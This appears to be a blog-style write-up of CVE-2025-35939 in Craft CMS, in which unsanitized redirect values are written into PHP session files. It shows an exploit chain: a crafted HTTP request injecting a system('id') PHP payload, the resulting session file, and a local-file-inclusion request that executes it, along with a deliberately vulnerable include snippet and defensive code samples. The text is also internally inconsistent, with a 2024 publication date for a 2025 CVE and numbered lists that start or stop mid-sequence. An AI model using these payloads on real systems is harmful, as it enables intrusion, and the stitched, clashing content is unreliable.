*Published: June 2024*
Craft CMS is a widely used content management system for building flexible websites and digital experiences. But recently, a serious vulnerability (tracked as *CVE-2025-35939*) was discovered, showing how an unauthenticated attacker could abuse the way session files are handled, leading to possible code injection or information leaks—especially when chained with other vulnerabilities.
In this article, we’ll break down exactly how CVE-2025-35939 works, walk through the potential exploit step by step, and provide code samples so you can see the vulnerability for yourself. We’ll also discuss mitigation and provide links to the original references.
Versions Affected: Before 5.7.5 and 4.15.3
- Vulnerability: Arbitrary content can be injected into unsanitized PHP session files by unauthenticated users
References:
- Craft CMS Security Advisory
- GitHub Issue & Patch
2. Passes along the originally requested URL as a "return" parameter.
3. Generates a session file for this user at /var/lib/php/sessions/sess_[session_id].
Here’s the dangerous part:
Craft CMS does not sanitize the "return" parameter adequately before storing it in the session data. This means an attacker can craft a malicious URL containing arbitrary content—including potentially PHP code—that gets stored directly into a predictable session file on disk.
Other vulnerabilities (like Local File Inclusion, LFI) could then be used to execute this code.
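The defensive counterpart to the bug described above is to validate the redirect target before it ever reaches session storage. The following is an added example, not Craft CMS code and not from the advisory: the function names, the allow-list rules and the fallback landing page "/admin/dashboard" are assumptions for the demo. It runs the check over a few constructed inputs, including the PHP-tag payload shape discussed in this article.

```php
<?php
// Added example, not Craft CMS code: validating a "return" redirect parameter
// before it is written into session data. Function names and the fallback
// landing page "/admin/dashboard" are assumptions for the demo.
declare(strict_types=1);

/**
 * Accept only a root-relative path such as "/admin/entries?page=2".
 * Returns the value unchanged when it passes, null when it is rejected.
 */
function sanitizeReturnUrl(string $candidate, int $maxLength = 512): ?string
{
    // A redirect target has no reason to be empty or kilobytes long.
    if ($candidate === '' || strlen($candidate) > $maxLength) {
        return null;
    }
    // Must start with exactly one "/": "//host/..." is a scheme-relative URL.
    if ($candidate[0] !== '/' || (isset($candidate[1]) && $candidate[1] === '/')) {
        return null;
    }
    // Strict character allow-list for path and query. Angle brackets, quotes,
    // parentheses, semicolons, whitespace and colons never pass, so PHP tags
    // and absolute URLs are rejected before anything reaches the session.
    if (!preg_match('#^/[A-Za-z0-9_\-./?=&%+~]*$#', $candidate)) {
        return null;
    }
    return $candidate;
}

/** Persist the redirect target only after validation; otherwise use a fixed page. */
function rememberReturnUrl(array &$session, string $raw): void
{
    $session['return'] = sanitizeReturnUrl($raw) ?? '/admin/dashboard';
}

// Constructed inputs: a legitimate target, the PHP-tag payload shape from the
// article (already URL-decoded, as PHP presents $_GET values), a scheme-relative
// URL, an absolute URL, and a percent-encoded variant. The last one is accepted
// but stays percent-encoded on disk, so the stored bytes are inert text.
$samples = [
    '/admin/entries?page=2',
    "<?php system('id'); ?>",
    '//evil.example/login',
    'https://evil.example/login',
    '/admin/%3C%3Fphp%20x%3B%20%3F%3E',
];

foreach ($samples as $raw) {
    $session = [];
    rememberReturnUrl($session, $raw);
    printf("%-36s -> stored: %s\n", $raw, $session['return']);
}
```

The allow-list approach is deliberately narrower than "strip PHP tags": a redirect target that needs characters outside that set is almost always a sign the value is not a local path at all.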
1. Attacker sends a request to a protected URL with a malicious return parameter:

```http
GET /admin?return=%3C?php%20system('id');%20?%3E HTTP/1.1
Host: victim-craftcms.local
Cookie: PHPSESSID=exploit12345
```
Here, the URL-encoded return parameter decodes to <?php system('id'); ?>. Because the value is not sanitized, it can end up written verbatim into the user's session file:
2. Craft CMS creates or updates the session file
Location: /var/lib/php/sessions/sess_exploit12345
The file will contain PHP's serialized session data, including the unsanitized return value, like this:

```text
return|s:22:"<?php system('id'); ?>";
```
3. Attacker knows the path and name of the session file
- Path: /var/lib/php/sessions/sess_exploit12345
4. If there’s an LFI vulnerability…
If the site has any LFI bug (including one in a plugin), the attacker can load their own session file via a crafted request:

```http
GET /index.php?template=/var/lib/php/sessions/sess_exploit12345
```

Because include parses the file as PHP source, system('id'); runs.
Let's simulate this with minimal PHP code. Suppose a site allows template inclusion like this:

```php
<?php
// Deliberately vulnerable: the include path comes straight from the request,
// so any readable file on disk (such as a session file) can be included.
if (isset($_GET['template'])) {
    include $_GET['template'];
}
```
When an attacker triggers the Craft CMS bug to create a session file containing

```php
<?php system('id'); ?>
```

and then requests

```text
http://example.com/index.php?template=/var/lib/php/sessions/sess_exploit12345
```

the server executes system('id');, demonstrating the vulnerability.
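The LFI half of the chain is the part the site itself controls. The following is an added example, not from the article or from Craft CMS, that rewrites the template include above so the request can only select a file inside one fixed directory; TEMPLATE_DIR and the ".php" suffix are assumptions for the demo. It runs the resolver over constructed request values, including the session-file path from the walkthrough.

```php
<?php
// Added example, not from the article or Craft CMS: the template include
// above rewritten so the request can only choose a file inside one fixed
// directory. TEMPLATE_DIR and the ".php" suffix are assumptions for the demo.
declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates';

/**
 * Map a user-supplied template name to a file under TEMPLATE_DIR.
 * Returns the canonical path, or null if the name is rejected.
 */
function resolveTemplate(string $name): ?string
{
    // Bare names only: no slashes, no dots, so ".." and absolute paths
    // such as a session file never get as far as the filesystem.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $name . '.php');
    // realpath() resolves symlinks; the prefix check catches a link that
    // points outside the template directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed request values, including the session-file path from the
// walkthrough; only a plain template name can resolve, and only if the
// corresponding file actually exists under TEMPLATE_DIR.
$requests = [
    'home',
    'home.php',
    '../../../../var/lib/php/sessions/sess_exploit12345',
    '/var/lib/php/sessions/sess_exploit12345',
];
foreach ($requests as $template) {
    $resolved = resolveTemplate($template);
    printf("%-52s -> %s\n", $template, $resolved ?? 'rejected');
    if ($resolved !== null) {
        include $resolved;   // safe: path proven to sit under TEMPLATE_DIR
    }
}
```

The name check alone would already stop the session-file path, but the realpath prefix comparison is what keeps the control honest if someone later loosens the pattern or drops a symlink into the template directory.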
- No Authentication Needed: The exploit can be triggered without logging in.
- Session File Paths: Often world-readable (or even world-writable) unless PHP is configured securely.
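Both points in that list are PHP configuration matters as much as Craft ones: an attacker-chosen PHPSESSID only becomes a predictable file name when session.use_strict_mode is off, and the file is only reachable by an include if the directory is readable and inside (or guessable from) the web root. The following is an added example, not Craft CMS code, that audits those settings at runtime; the document-root argument and the permission threshold are assumptions for the demo, and it toggles strict mode in-process to show a weak and a hardened result side by side.

```php
<?php
// Added example, not Craft CMS code: a runtime check of the PHP session
// settings that make the session-file step of this chain possible. The
// document-root argument and the thresholds are assumptions for the demo.
declare(strict_types=1);

/** Interpret php.ini style boolean values ("1", "On", "true", ...). */
function iniFlag(string $name): bool
{
    return filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN);
}

/** Return a list of findings; an empty list means nothing was flagged. */
function auditSessionConfig(string $documentRoot): array
{
    $findings = [];

    // Client-chosen session IDs (Cookie: PHPSESSID=exploit12345) are only
    // honoured when strict mode is off; with it on, PHP issues its own ID,
    // so the session file name is no longer predictable.
    if (!iniFlag('session.use_strict_mode')) {
        $findings[] = 'session.use_strict_mode=0: client-supplied session IDs are accepted';
    }

    // Only the "files" handler writes session data to the local disk.
    if (ini_get('session.save_handler') === 'files') {
        // save_path may carry an "N;mode;/path" prefix; keep the path component.
        $parts = explode(';', (string) ini_get('session.save_path'));
        $savePath = end($parts) ?: sys_get_temp_dir();
        $real = realpath($savePath) ?: $savePath;
        $root = rtrim(realpath($documentRoot) ?: $documentRoot, '/');

        if ($root !== '' && strncmp($real, $root . '/', strlen($root) + 1) === 0) {
            $findings[] = "session.save_path=$real lies inside the document root";
        }
        if (is_dir($real) && (fileperms($real) & 0077) !== 0) {
            $findings[] = sprintf('session directory %s is group/world accessible (%o)',
                $real, fileperms($real) & 0777);
        }
    }
    return $findings;
}

// Constructed demo: simulate a weak and a hardened strict-mode setting in-process.
foreach (['0', '1'] as $strict) {
    ini_set('session.use_strict_mode', $strict);
    $findings = auditSessionConfig('/var/www/html');   // assumed document root
    echo "use_strict_mode=$strict: "
        . ($findings ? implode('; ', $findings) : 'no findings') . "\n";
}
```

In practice the same checks belong in php.ini rather than at runtime: session.use_strict_mode=1, a per-site session.save_path outside the document root owned by the PHP worker with mode 0700, or a non-file save handler so there is no session file on disk at all.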
To stay safe:
1. Update Immediately to the latest version (Download here).
References and Further Reading
- Official Craft CMS Advisory – CVE-2025-35939
- Craft CMS Releases and Changelog (GitHub)
- PHP Sessions Security
- Understanding Local File Inclusion (OWASP)
Conclusion
CVE-2025-35939 is a classic example of how unsanitized user input can lead to dangerous results, especially when session storage mechanisms make it easy for attackers to predict file names and locations. Even without a direct code execution vector, this bug dramatically opens up the attack surface. Combine it with other vulnerabilities, and you have a recipe for a serious breach.
Don’t wait—patch your Craft CMS today.
If you run bug bounty or pentesting on Craft CMS, keep your eyes peeled for similar session handling weaknesses!
Timeline
Published on: 05/07/2025 23:15:54 UTC
Last modified on: 06/03/2025 20:59:34 UTC